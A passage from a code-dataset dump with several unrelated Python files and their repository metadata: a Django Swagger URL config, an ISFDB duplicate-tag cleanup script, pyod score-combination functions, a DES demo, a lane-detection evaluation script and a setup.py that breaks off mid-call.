            generator = SchemaGenerator(
                title=title,
                url=url,
                description=description,
                patterns=patterns,
                urlconf=urlconf
            )
            schema = generator.get_schema(request=request)
            if not schema:
                raise exceptions.ValidationError(
                    'The schema generator did not return a schema Document'
                )
            return Response(schema)

    return SwaggerSchemaView.as_view()
# Swagger schema view for the public MantisTable REST API (routes in api/).
mantis_schema_view = get_swagger_view(
    title='MantisTable API',
    url="/api",
    urlconf=api_urls,
    description="MantisTable API allows to identify annotations (Entity Linking, Predicate Annotation, Concept Annotation) by using a non-destructive, incremental approach"
)
# Swagger schema view for the internal frontend API (routes in web_api/).
frontend_schema_view = get_swagger_view(
    title='Frontend API',
    url="/webapi",
    urlconf=webapi_urls,
    description="MantisTable Frontend API"
)
# URL routing table: root redirects to the dashboard; each API prefix is
# registered twice -- once for the app's endpoints, once for its schema view.
urlpatterns = [
    path('', RedirectView.as_view(url='dashboard', permanent=False), name='index'),
    path('dashboard/', include('dashboard.urls')),
    path('webapi/', include('web_api.urls')),
    path('webapi/', frontend_schema_view),
    path('api/', include('api.urls')),
    path('api/', mantis_schema_view),
    path('admin/', admin.site.urls)
]
| 30.907895 | 172 | 0.680289 | from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import RedirectView
from rest_framework_swagger import renderers
from rest_framework import exceptions
from rest_framework.permissions import AllowAny
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.response import Response
from rest_framework.schemas import SchemaGenerator
from rest_framework.views import APIView
from api import urls as api_urls
from web_api import urls as webapi_urls
def get_swagger_view(title=None, url=None, patterns=None, urlconf=None, description=None):
    """
    Returns schema view which renders Swagger/OpenAPI.

    The view class is created inside this factory so it can capture the
    schema parameters as a closure.
    """
    class SwaggerSchemaView(APIView):
        # keep the docs page itself out of the schema and open to everyone
        _ignore_model_permissions = True
        exclude_from_schema = True
        permission_classes = [AllowAny]
        renderer_classes = [
            CoreJSONRenderer,
            renderers.OpenAPIRenderer,
            renderers.SwaggerUIRenderer
        ]

        def get(self, request):
            # regenerate the schema document for every request
            schema_generator = SchemaGenerator(
                title=title, url=url, description=description,
                patterns=patterns, urlconf=urlconf)
            document = schema_generator.get_schema(request=request)
            if not document:
                raise exceptions.ValidationError(
                    'The schema generator did not return a schema Document'
                )
            return Response(document)

    return SwaggerSchemaView.as_view()
# Swagger schema view for the public MantisTable REST API (routes in api/).
mantis_schema_view = get_swagger_view(
    title='MantisTable API',
    url="/api",
    urlconf=api_urls,
    description="MantisTable API allows to identify annotations (Entity Linking, Predicate Annotation, Concept Annotation) by using a non-destructive, incremental approach"
)
# Swagger schema view for the internal frontend API (routes in web_api/).
frontend_schema_view = get_swagger_view(
    title='Frontend API',
    url="/webapi",
    urlconf=webapi_urls,
    description="MantisTable Frontend API"
)
# URL routing table: root redirects to the dashboard; each API prefix is
# registered twice -- once for the app's endpoints, once for its schema view.
urlpatterns = [
    path('', RedirectView.as_view(url='dashboard', permanent=False), name='index'),
    path('dashboard/', include('dashboard.urls')),
    path('webapi/', include('web_api.urls')),
    path('webapi/', frontend_schema_view),
    path('api/', include('api.urls')),
    path('api/', mantis_schema_view),
    path('admin/', admin.site.urls)
]
| 487 | 307 | 26 |
2d3a4e48defe14889dec4547a5425bc35ef8360b | 1,618 | py | Python | scripts/delete_duplicate_tags.py | lokal-profil/isfdb_site | 0ce20d6347849926d4eda961ea9249c31519eea5 | [
"BSD-3-Clause"
] | null | null | null | scripts/delete_duplicate_tags.py | lokal-profil/isfdb_site | 0ce20d6347849926d4eda961ea9249c31519eea5 | [
"BSD-3-Clause"
] | null | null | null | scripts/delete_duplicate_tags.py | lokal-profil/isfdb_site | 0ce20d6347849926d4eda961ea9249c31519eea5 | [
"BSD-3-Clause"
] | null | null | null | #!_PYTHONLOC
#
# (C) COPYRIGHT 2014 Ahasuerus
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import os
import string
import MySQLdb
from localdefs import *
if __name__ == '__main__':
db = MySQLdb.connect(DBASEHOST, USERNAME, PASSWORD, conv=IsfdbConvSetup())
db.select_db(DBASE)
# Find all duplicate tags
query = "select tag_id,title_id,user_id,count(*) as xx from tag_mapping group by tag_id,title_id,user_id having xx > 1"
db.query(query)
result = db.store_result()
tag_count = result.num_rows()
record = result.fetch_row()
tags = []
while record:
tags.append(record[0])
record = result.fetch_row()
row_count = 0
for tag in tags:
tag_id = tag[0]
title_id = tag[1]
user_id = tag[2]
row_count += int(tag[3])
update = "delete from tag_mapping where tag_id=%d and title_id=%d and user_id=%d" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
update = "insert into tag_mapping(tag_id, title_id, user_id) values(%d, %d, %d)" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
print "Total processed: %d rows in %d tags" % (row_count, tag_count)
| 28.892857 | 138 | 0.633498 | #!_PYTHONLOC
#
# (C) COPYRIGHT 2014 Ahasuerus
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import os
import string
import MySQLdb
from localdefs import *
def Date_or_None(s):
    """Pass-through converter: return the raw column value unchanged."""
    return s
def IsfdbConvSetup():
    """Return a MySQLdb conversion map where field type code 10 (presumably
    MySQL DATE -- confirm against MySQLdb.constants.FIELD_TYPE) is passed
    through raw via Date_or_None instead of being converted to a Python
    date object.
    """
    import MySQLdb.converters
    IsfdbConv = MySQLdb.converters.conversions
    IsfdbConv[10] = Date_or_None
    return(IsfdbConv)
if __name__ == '__main__':
    db = MySQLdb.connect(DBASEHOST, USERNAME, PASSWORD, conv=IsfdbConvSetup())
    db.select_db(DBASE)
    # Find all duplicate tags: (tag, title, user) triples with more than one row
    query = "select tag_id,title_id,user_id,count(*) as xx from tag_mapping group by tag_id,title_id,user_id having xx > 1"
    db.query(query)
    result = db.store_result()
    tag_count = result.num_rows()
    record = result.fetch_row()
    tags = []
    while record:
        tags.append(record[0])
        record = result.fetch_row()
    row_count = 0
    # For each duplicate triple: delete every copy, then re-insert exactly one
    # row; row_count accumulates how many duplicate rows existed in total.
    for tag in tags:
        tag_id = tag[0]
        title_id = tag[1]
        user_id = tag[2]
        row_count += int(tag[3])
        update = "delete from tag_mapping where tag_id=%d and title_id=%d and user_id=%d" % (int(tag_id), int(title_id), int(user_id))
        db.query(update)
        update = "insert into tag_mapping(tag_id, title_id, user_id) values(%d, %d, %d)" % (int(tag_id), int(title_id), int(user_id))
        db.query(update)
    print "Total processed: %d rows in %d tags" % (row_count, tag_count)
| 160 | 0 | 46 |
6ad791046708ce8b4b90ae8c899b17e57d7654a3 | 9,745 | py | Python | pyod/models/combination.py | marchezinixd/pyod | 3c2de3237245e682fe0c9c1ae6a987d4d238cced | [
"BSD-2-Clause"
] | 1 | 2021-07-14T08:23:40.000Z | 2021-07-14T08:23:40.000Z | pyod/models/combination.py | vgarcialeandro/pyod | 03ec97cb95f9a20a39807e7e5983d35b0cd46d31 | [
"BSD-2-Clause"
] | null | null | null | pyod/models/combination.py | vgarcialeandro/pyod | 03ec97cb95f9a20a39807e7e5983d35b0cd46d31 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""A collection of model combination functionalities.
"""
# Author: Yue Zhao <zhaoy@cmu.edu>
# License: BSD 2 clause
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.random import RandomState
from sklearn.utils import check_array
from sklearn.utils import column_or_1d
# noinspection PyProtectedMember
from sklearn.utils import shuffle
from sklearn.utils.random import sample_without_replacement
from sklearn.utils.testing import assert_equal
from ..utils.utility import check_parameter
def _aom_moa_helper(mode, scores, n_buckets, method, bootstrap_estimators,
                    random_state):
    """Internal helper function for Average of Maximum (AOM) and
    Maximum of Average (MOA). See :cite:`aggarwal2015theoretical` for details.
    First dividing estimators into subgroups, take the maximum/average score
    as the subgroup score. Finally, take the average/maximum of all subgroup
    outlier scores.
    Parameters
    ----------
    mode : str
        Define the operation model, either "AOM" or "MOA".
    scores : numpy array of shape (n_samples, n_estimators)
        The score matrix outputted from various estimators.
    n_buckets : int, optional (default=5)
        The number of subgroups to build.
    method : str, optional (default='static')
        {'static', 'dynamic'}, if 'dynamic', build subgroups
        randomly with dynamic bucket size.
    bootstrap_estimators : bool, optional (default=False)
        Whether estimators are drawn with replacement.
    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the
        random number generator; If RandomState instance, random_state is
        the random number generator; If None, the random number generator
        is the RandomState instance used by `np.random`.
    Returns
    -------
    combined_scores : Numpy array of shape (n_samples,)
        The combined outlier scores.
    """
    if mode != 'AOM' and mode != 'MOA':
        raise NotImplementedError(
            '{mode} is not implemented'.format(mode=mode))
    scores = check_array(scores)
    # TODO: add one more parameter for max number of estimators
    # use random_state instead
    # for now it is fixed at n_estimators/2
    n_estimators = scores.shape[1]
    check_parameter(n_buckets, 2, n_estimators, param_name='n_buckets')
    # one column per subgroup, filled below with the subgroup's combined score
    scores_buckets = np.zeros([scores.shape[0], n_buckets])
    if method == 'static':
        # 'static': equal-sized buckets; requires n_estimators % n_buckets == 0
        n_estimators_per_bucket = int(n_estimators / n_buckets)
        if n_estimators % n_buckets != 0:
            raise ValueError('n_estimators / n_buckets has a remainder. Not '
                             'allowed in static mode.')
        if not bootstrap_estimators:
            # shuffle the estimator order, then slice into contiguous buckets
            shuffled_list = shuffle(list(range(0, n_estimators, 1)),
                                    random_state=random_state)
            head = 0
            for i in range(0, n_estimators, n_estimators_per_bucket):
                tail = i + n_estimators_per_bucket
                batch_ind = int(i / n_estimators_per_bucket)
                if mode == 'AOM':
                    scores_buckets[:, batch_ind] = np.max(
                        scores[:, shuffled_list[head:tail]], axis=1)
                else:
                    scores_buckets[:, batch_ind] = np.mean(
                        scores[:, shuffled_list[head:tail]], axis=1)
                # increment index
                head = head + n_estimators_per_bucket
        # noinspection PyUnusedLocal
        else:
            # bootstrap: each bucket samples estimators without replacement,
            # but buckets may overlap each other
            for i in range(n_buckets):
                ind = sample_without_replacement(n_estimators,
                                                 n_estimators_per_bucket,
                                                 random_state=random_state)
                if mode == 'AOM':
                    scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
                else:
                    scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
    elif method == 'dynamic':  # random bucket size
        for i in range(n_buckets):
            # the number of estimators in a bucket should be 2 - n/2
            # NOTE(review): with an int random_state, RandomState(seed=...)
            # yields the same bucket size every iteration -- confirm intended
            max_estimator_per_bucket = RandomState(seed=random_state).randint(
                2, int(n_estimators / 2))
            ind = sample_without_replacement(n_estimators,
                                             max_estimator_per_bucket,
                                             random_state=random_state)
            if mode == 'AOM':
                scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
            else:
                scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
    else:
        raise NotImplementedError(
            '{method} is not implemented'.format(method=method))
    # AOM: average of per-bucket maxima; MOA: maximum of per-bucket means
    if mode == 'AOM':
        return np.mean(scores_buckets, axis=1)
    else:
        return np.max(scores_buckets, axis=1)
def aom(scores, n_buckets=5, method='static', bootstrap_estimators=False,
        random_state=None):
    """Average of Maximum (AOM) score combination.

    Splits the estimators into ``n_buckets`` subgroups, takes the maximum
    score within each subgroup, then averages the subgroup scores.
    See :cite:`aggarwal2015theoretical` for details.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        The score matrix outputted from various estimators.
    n_buckets : int, optional (default=5)
        The number of subgroups to build.
    method : str, optional (default='static')
        {'static', 'dynamic'}, if 'dynamic', build subgroups
        randomly with dynamic bucket size.
    bootstrap_estimators : bool, optional (default=False)
        Whether estimators are drawn with replacement.
    random_state : int, RandomState instance or None, optional (default=None)
        Seed or generator controlling the random subgrouping; None uses
        the global `np.random` state.

    Returns
    -------
    combined_scores : Numpy array of shape (n_samples,)
        The combined outlier scores.
    """
    # thin wrapper: all the work happens in the shared helper
    return _aom_moa_helper(
        mode='AOM',
        scores=scores,
        n_buckets=n_buckets,
        method=method,
        bootstrap_estimators=bootstrap_estimators,
        random_state=random_state,
    )
def moa(scores, n_buckets=5, method='static', bootstrap_estimators=False,
        random_state=None):
    """Maximization of Average (MOA) score combination.

    Splits the estimators into ``n_buckets`` subgroups, takes the average
    score within each subgroup, then keeps the maximum subgroup score.
    See :cite:`aggarwal2015theoretical` for details.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        The score matrix outputted from various estimators.
    n_buckets : int, optional (default=5)
        The number of subgroups to build.
    method : str, optional (default='static')
        {'static', 'dynamic'}, if 'dynamic', build subgroups
        randomly with dynamic bucket size.
    bootstrap_estimators : bool, optional (default=False)
        Whether estimators are drawn with replacement.
    random_state : int, RandomState instance or None, optional (default=None)
        Seed or generator controlling the random subgrouping; None uses
        the global `np.random` state.

    Returns
    -------
    combined_scores : Numpy array of shape (n_samples,)
        The combined outlier scores.
    """
    # thin wrapper: all the work happens in the shared helper
    return _aom_moa_helper(
        mode='MOA',
        scores=scores,
        n_buckets=n_buckets,
        method=method,
        bootstrap_estimators=bootstrap_estimators,
        random_state=random_state,
    )
def average(scores, estimator_weights=None):
    """Combination method to merge the outlier scores from multiple estimators
    by taking the average.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        Score matrix from multiple estimators on the same samples.

    estimator_weights : array-like of shape (1, n_estimators), optional
        If specified, using weighted average.

    Returns
    -------
    combined_scores : numpy array of shape (n_samples, )
        The combined outlier scores.
    """
    scores = check_array(scores)
    if estimator_weights is not None:
        # Coerce to ndarray: the docstring advertises list input, but the
        # original accessed .shape directly and raised AttributeError on lists.
        estimator_weights = np.asarray(estimator_weights)
        if estimator_weights.shape != (1, scores.shape[1]):
            raise ValueError(
                'Bad input shape of estimator_weight: (1, {score_shape}),'
                'and {estimator_weights} received'.format(
                    score_shape=scores.shape[1],
                    estimator_weights=estimator_weights.shape))
        # weighted average: (d1*w1 + d2*w2 + ...+ dn*wn)/(w1+w2+...+wn)
        scores = np.sum(np.multiply(scores, estimator_weights),
                        axis=1) / np.sum(estimator_weights)
        return scores.ravel()
    else:
        return np.mean(scores, axis=1).ravel()
def maximization(scores):
    """Combine outlier scores from multiple estimators by keeping, for each
    sample, the maximum score across all estimators.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        Score matrix from multiple estimators on the same samples.

    Returns
    -------
    combined_scores : numpy array of shape (n_samples, )
        The combined outlier scores.
    """
    validated = check_array(scores)
    # per-row maximum, flattened to a 1-D array
    return validated.max(axis=1).ravel()
| 36.36194 | 78 | 0.636018 | # -*- coding: utf-8 -*-
"""A collection of model combination functionalities.
"""
# Author: Yue Zhao <zhaoy@cmu.edu>
# License: BSD 2 clause
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.random import RandomState
from sklearn.utils import check_array
from sklearn.utils import column_or_1d
# noinspection PyProtectedMember
from sklearn.utils import shuffle
from sklearn.utils.random import sample_without_replacement
from sklearn.utils.testing import assert_equal
from ..utils.utility import check_parameter
def _aom_moa_helper(mode, scores, n_buckets, method, bootstrap_estimators,
                    random_state):
    """Internal helper function for Average of Maximum (AOM) and
    Maximum of Average (MOA). See :cite:`aggarwal2015theoretical` for details.
    First dividing estimators into subgroups, take the maximum/average score
    as the subgroup score. Finally, take the average/maximum of all subgroup
    outlier scores.
    Parameters
    ----------
    mode : str
        Define the operation model, either "AOM" or "MOA".
    scores : numpy array of shape (n_samples, n_estimators)
        The score matrix outputted from various estimators.
    n_buckets : int, optional (default=5)
        The number of subgroups to build.
    method : str, optional (default='static')
        {'static', 'dynamic'}, if 'dynamic', build subgroups
        randomly with dynamic bucket size.
    bootstrap_estimators : bool, optional (default=False)
        Whether estimators are drawn with replacement.
    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the
        random number generator; If RandomState instance, random_state is
        the random number generator; If None, the random number generator
        is the RandomState instance used by `np.random`.
    Returns
    -------
    combined_scores : Numpy array of shape (n_samples,)
        The combined outlier scores.
    """
    if mode != 'AOM' and mode != 'MOA':
        raise NotImplementedError(
            '{mode} is not implemented'.format(mode=mode))
    scores = check_array(scores)
    # TODO: add one more parameter for max number of estimators
    # use random_state instead
    # for now it is fixed at n_estimators/2
    n_estimators = scores.shape[1]
    check_parameter(n_buckets, 2, n_estimators, param_name='n_buckets')
    # one column per subgroup, filled below with the subgroup's combined score
    scores_buckets = np.zeros([scores.shape[0], n_buckets])
    if method == 'static':
        # 'static': equal-sized buckets; requires n_estimators % n_buckets == 0
        n_estimators_per_bucket = int(n_estimators / n_buckets)
        if n_estimators % n_buckets != 0:
            raise ValueError('n_estimators / n_buckets has a remainder. Not '
                             'allowed in static mode.')
        if not bootstrap_estimators:
            # shuffle the estimator order, then slice into contiguous buckets
            shuffled_list = shuffle(list(range(0, n_estimators, 1)),
                                    random_state=random_state)
            head = 0
            for i in range(0, n_estimators, n_estimators_per_bucket):
                tail = i + n_estimators_per_bucket
                batch_ind = int(i / n_estimators_per_bucket)
                if mode == 'AOM':
                    scores_buckets[:, batch_ind] = np.max(
                        scores[:, shuffled_list[head:tail]], axis=1)
                else:
                    scores_buckets[:, batch_ind] = np.mean(
                        scores[:, shuffled_list[head:tail]], axis=1)
                # increment index
                head = head + n_estimators_per_bucket
        # noinspection PyUnusedLocal
        else:
            # bootstrap: each bucket samples estimators without replacement,
            # but buckets may overlap each other
            for i in range(n_buckets):
                ind = sample_without_replacement(n_estimators,
                                                 n_estimators_per_bucket,
                                                 random_state=random_state)
                if mode == 'AOM':
                    scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
                else:
                    scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
    elif method == 'dynamic':  # random bucket size
        for i in range(n_buckets):
            # the number of estimators in a bucket should be 2 - n/2
            # NOTE(review): with an int random_state, RandomState(seed=...)
            # yields the same bucket size every iteration -- confirm intended
            max_estimator_per_bucket = RandomState(seed=random_state).randint(
                2, int(n_estimators / 2))
            ind = sample_without_replacement(n_estimators,
                                             max_estimator_per_bucket,
                                             random_state=random_state)
            if mode == 'AOM':
                scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
            else:
                scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
    else:
        raise NotImplementedError(
            '{method} is not implemented'.format(method=method))
    # AOM: average of per-bucket maxima; MOA: maximum of per-bucket means
    if mode == 'AOM':
        return np.mean(scores_buckets, axis=1)
    else:
        return np.max(scores_buckets, axis=1)
def aom(scores, n_buckets=5, method='static', bootstrap_estimators=False,
        random_state=None):
    """Average of Maximum (AOM) score combination.

    Splits the estimators into ``n_buckets`` subgroups, takes the maximum
    score within each subgroup, then averages the subgroup scores.
    See :cite:`aggarwal2015theoretical` for details.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        The score matrix outputted from various estimators.
    n_buckets : int, optional (default=5)
        The number of subgroups to build.
    method : str, optional (default='static')
        {'static', 'dynamic'}, if 'dynamic', build subgroups
        randomly with dynamic bucket size.
    bootstrap_estimators : bool, optional (default=False)
        Whether estimators are drawn with replacement.
    random_state : int, RandomState instance or None, optional (default=None)
        Seed or generator controlling the random subgrouping; None uses
        the global `np.random` state.

    Returns
    -------
    combined_scores : Numpy array of shape (n_samples,)
        The combined outlier scores.
    """
    # thin wrapper: all the work happens in the shared helper
    return _aom_moa_helper(
        mode='AOM',
        scores=scores,
        n_buckets=n_buckets,
        method=method,
        bootstrap_estimators=bootstrap_estimators,
        random_state=random_state,
    )
def moa(scores, n_buckets=5, method='static', bootstrap_estimators=False,
        random_state=None):
    """Maximization of Average (MOA) score combination.

    Splits the estimators into ``n_buckets`` subgroups, takes the average
    score within each subgroup, then keeps the maximum subgroup score.
    See :cite:`aggarwal2015theoretical` for details.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        The score matrix outputted from various estimators.
    n_buckets : int, optional (default=5)
        The number of subgroups to build.
    method : str, optional (default='static')
        {'static', 'dynamic'}, if 'dynamic', build subgroups
        randomly with dynamic bucket size.
    bootstrap_estimators : bool, optional (default=False)
        Whether estimators are drawn with replacement.
    random_state : int, RandomState instance or None, optional (default=None)
        Seed or generator controlling the random subgrouping; None uses
        the global `np.random` state.

    Returns
    -------
    combined_scores : Numpy array of shape (n_samples,)
        The combined outlier scores.
    """
    # thin wrapper: all the work happens in the shared helper
    return _aom_moa_helper(
        mode='MOA',
        scores=scores,
        n_buckets=n_buckets,
        method=method,
        bootstrap_estimators=bootstrap_estimators,
        random_state=random_state,
    )
def average(scores, estimator_weights=None):
    """Combination method to merge the outlier scores from multiple estimators
    by taking the average.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        Score matrix from multiple estimators on the same samples.

    estimator_weights : array-like of shape (1, n_estimators), optional
        If specified, using weighted average.

    Returns
    -------
    combined_scores : numpy array of shape (n_samples, )
        The combined outlier scores.
    """
    scores = check_array(scores)
    if estimator_weights is not None:
        # Coerce to ndarray: the docstring advertises list input, but the
        # original accessed .shape directly and raised AttributeError on lists.
        estimator_weights = np.asarray(estimator_weights)
        if estimator_weights.shape != (1, scores.shape[1]):
            raise ValueError(
                'Bad input shape of estimator_weight: (1, {score_shape}),'
                'and {estimator_weights} received'.format(
                    score_shape=scores.shape[1],
                    estimator_weights=estimator_weights.shape))
        # weighted average: (d1*w1 + d2*w2 + ...+ dn*wn)/(w1+w2+...+wn)
        scores = np.sum(np.multiply(scores, estimator_weights),
                        axis=1) / np.sum(estimator_weights)
        return scores.ravel()
    else:
        return np.mean(scores, axis=1).ravel()
def maximization(scores):
    """Combine outlier scores from multiple estimators by keeping, for each
    sample, the maximum score across all estimators.

    Parameters
    ----------
    scores : numpy array of shape (n_samples, n_estimators)
        Score matrix from multiple estimators on the same samples.

    Returns
    -------
    combined_scores : numpy array of shape (n_samples, )
        The combined outlier scores.
    """
    validated = check_array(scores)
    # per-row maximum, flattened to a 1-D array
    return validated.max(axis=1).ravel()
| 0 | 0 | 0 |
6799b6115ad4101e894be13612541c18fac3a3c0 | 228 | py | Python | driver.py | anishLearnsToCode/DES | 193e0b59d355b1f5a030e362d704db1199643367 | [
"MIT"
] | 3 | 2020-08-27T11:01:54.000Z | 2021-08-05T16:47:43.000Z | driver.py | anishLearnsToCode/DES | 193e0b59d355b1f5a030e362d704db1199643367 | [
"MIT"
] | null | null | null | driver.py | anishLearnsToCode/DES | 193e0b59d355b1f5a030e362d704db1199643367 | [
"MIT"
] | 1 | 2020-11-01T00:43:13.000Z | 2020-11-01T00:43:13.000Z | from des import DES
des = DES(key=193)
number = 123456
ciphertext = des.encrypt_number(number)
decrypted = des.decrypt_number(ciphertext)
print('Number:', number)
print('Encrypted:', ciphertext)
print('Decrypyed', decrypted)
| 19 | 42 | 0.758772 | from des import DES
des = DES(key=193)
number = 123456
ciphertext = des.encrypt_number(number)
decrypted = des.decrypt_number(ciphertext)
print('Number:', number)
print('Encrypted:', ciphertext)
print('Decrypyed', decrypted)
| 0 | 0 | 0 |
78af9b37381badff33d7d5ddb89277c199570422 | 1,505 | py | Python | utils/upperbound.py | atharva-diwan/PolyLaneNet | ec58d1d5207e78233e25dd501a58ce535a82cd1e | [
"MIT"
] | 540 | 2020-11-10T11:09:00.000Z | 2022-03-30T01:49:33.000Z | utils/upperbound.py | chisyliu/PolyLaneNet | c89500428ddd72e7c3027955d88fd074603f48e0 | [
"MIT"
] | 83 | 2020-11-14T17:43:34.000Z | 2022-03-22T08:49:23.000Z | utils/upperbound.py | chisyliu/PolyLaneNet | c89500428ddd72e7c3027955d88fd074603f48e0 | [
"MIT"
] | 122 | 2020-11-12T01:29:12.000Z | 2022-03-23T09:50:50.000Z | import sys
import warnings
import numpy as np
from progressbar import progressbar
from lib.config import Config
from utils.evaluator import Evaluator
warnings.simplefilter('ignore', np.RankWarning)
if __name__ == "__main__":
cfg = Config(sys.argv[1] if len(sys.argv) > 1 else 'config.yaml')
dataset = cfg.get_dataset('test')
for n in range(1, 5 + 1):
result = polyfit_upperbound(dataset, n)
print('Degree {} upperbound:'.format(n))
for metric in result:
if metric['name'] == 'Accuracy':
print('\t{}: {:.2f}'.format(metric['name'], metric['value'] * 100))
else:
print('\t{}: {:.3f}'.format(metric['name'], metric['value']))
| 33.444444 | 83 | 0.572093 | import sys
import warnings
import numpy as np
from progressbar import progressbar
from lib.config import Config
from utils.evaluator import Evaluator
warnings.simplefilter('ignore', np.RankWarning)
def polyfit_upperbound(dataset, degree):
evaluator = Evaluator(dataset, '/tmp', degree)
print('Predicting with upperbound...')
for i, anno in enumerate(progressbar(dataset.annotations)):
label = anno['label']
pred = np.zeros((label.shape[0], 1 + 2 + degree + 1))
pred[:, :3] = label[:, :3]
for j, lane in enumerate(label):
if lane[0] == 0:
continue
xy = lane[3:]
x = xy[:(len(xy) // 2)]
y = xy[(len(xy) // 2):]
ind = x > 0
pred[j, -(degree + 1):] = np.polyfit(y[ind], x[ind], degree)
evaluator.add_prediction([i], pred, 0.0005) # 0.0005 = dummy runtime
_, result = evaluator.eval(label='upperbound', only_metrics=True)
return result
if __name__ == "__main__":
cfg = Config(sys.argv[1] if len(sys.argv) > 1 else 'config.yaml')
dataset = cfg.get_dataset('test')
for n in range(1, 5 + 1):
result = polyfit_upperbound(dataset, n)
print('Degree {} upperbound:'.format(n))
for metric in result:
if metric['name'] == 'Accuracy':
print('\t{}: {:.2f}'.format(metric['name'], metric['value'] * 100))
else:
print('\t{}: {:.3f}'.format(metric['name'], metric['value']))
| 761 | 0 | 23 |
e0f582ab986d59429d0dd26f613fbcdd89e6425c | 95 | py | Python | faster_rcnn/symbols/__init__.py | fourmi1995/IronExperiment-DCN | 5292539764588e0168016c7e7b4df038358e9f38 | [
"MIT"
] | 2 | 2020-11-10T07:37:09.000Z | 2021-02-09T06:26:25.000Z | faster_rcnn/symbols/__init__.py | fourmi1995/IronExperiment-DCN | 5292539764588e0168016c7e7b4df038358e9f38 | [
"MIT"
] | null | null | null | faster_rcnn/symbols/__init__.py | fourmi1995/IronExperiment-DCN | 5292539764588e0168016c7e7b4df038358e9f38 | [
"MIT"
] | 1 | 2019-08-07T02:35:16.000Z | 2019-08-07T02:35:16.000Z | import resnet_v1_101_rcnn
import resnet_v1_101_rcnn_dcn
import resnet_v1_101_rcnn_dcn_dense
| 23.75 | 36 | 0.905263 | import resnet_v1_101_rcnn
import resnet_v1_101_rcnn_dcn
import resnet_v1_101_rcnn_dcn_dense
| 0 | 0 | 0 |
d9f21745b42cce43949cdd8e3409093c49f6d8af | 1,697 | py | Python | setup.py | cedadev/django-jdma_control | 9223aa2f8773e78c6f78197ae89289452d1285c9 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cedadev/django-jdma_control | 9223aa2f8773e78c6f78197ae89289452d1285c9 | [
"BSD-3-Clause"
] | 23 | 2018-03-21T14:36:24.000Z | 2020-04-17T07:58:33.000Z | setup.py | cedadev/django-jdma_control | 9223aa2f8773e78c6f78197ae89289452d1285c9 | [
"BSD-3-Clause"
] | null | null | null | import os
from setuptools import setup
# Read the project README for reuse as the PyPI long description.
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
    README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# Distribution metadata for the jdma_control Django app.
setup(
    name='jdma_control',
    version='0.2.27',
    packages=['jdma_control'],
    install_requires=[
        'appdirs',
        'beautifulsoup4',
        'boto3',
        'django',
        'django-extensions',
        'django-multiselectfield',
        'django-sizefield',
        'html5lib',
        'lxml',
        'jasmin-ldap',
        'packaging',
        'psycopg2-binary',
        'pycryptodome',
        'pyparsing',
        'pytz',
        'requests'
    ],
    include_package_data=True,
    # NOTE(review): 'my License' is a placeholder while the classifier below
    # declares BSD -- confirm the intended licence string.
    license='my License',  # example license
    # NOTE(review): these adjacent literals concatenate without a space
    # ("...externalstorage...") -- likely a missing trailing space.
    description=('A Django app to migrate directories of files to external'
                 'storage from groupworkspaces on JASMIN.'),
    long_description=README,
    url='http://www.ceda.ac.uk/',
    author='Neil Massey',
    author_email='neil.massey@stfc.ac.uk',
    classifiers=[
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',  # example license
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        # Replace these appropriately if you are stuck on Python 2.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
    ],
)
| 30.854545 | 78 | 0.595168 | import os
from setuptools import setup
# Read the project README for reuse as the PyPI long description.
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
    README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# Distribution metadata for the jdma_control Django app.
setup(
    name='jdma_control',
    version='0.2.27',
    packages=['jdma_control'],
    install_requires=[
        'appdirs',
        'beautifulsoup4',
        'boto3',
        'django',
        'django-extensions',
        'django-multiselectfield',
        'django-sizefield',
        'html5lib',
        'lxml',
        'jasmin-ldap',
        'packaging',
        'psycopg2-binary',
        'pycryptodome',
        'pyparsing',
        'pytz',
        'requests'
    ],
    include_package_data=True,
    # NOTE(review): 'my License' is a placeholder while the classifier below
    # declares BSD -- confirm the intended licence string.
    license='my License',  # example license
    # NOTE(review): these adjacent literals concatenate without a space
    # ("...externalstorage...") -- likely a missing trailing space.
    description=('A Django app to migrate directories of files to external'
                 'storage from groupworkspaces on JASMIN.'),
    long_description=README,
    url='http://www.ceda.ac.uk/',
    author='Neil Massey',
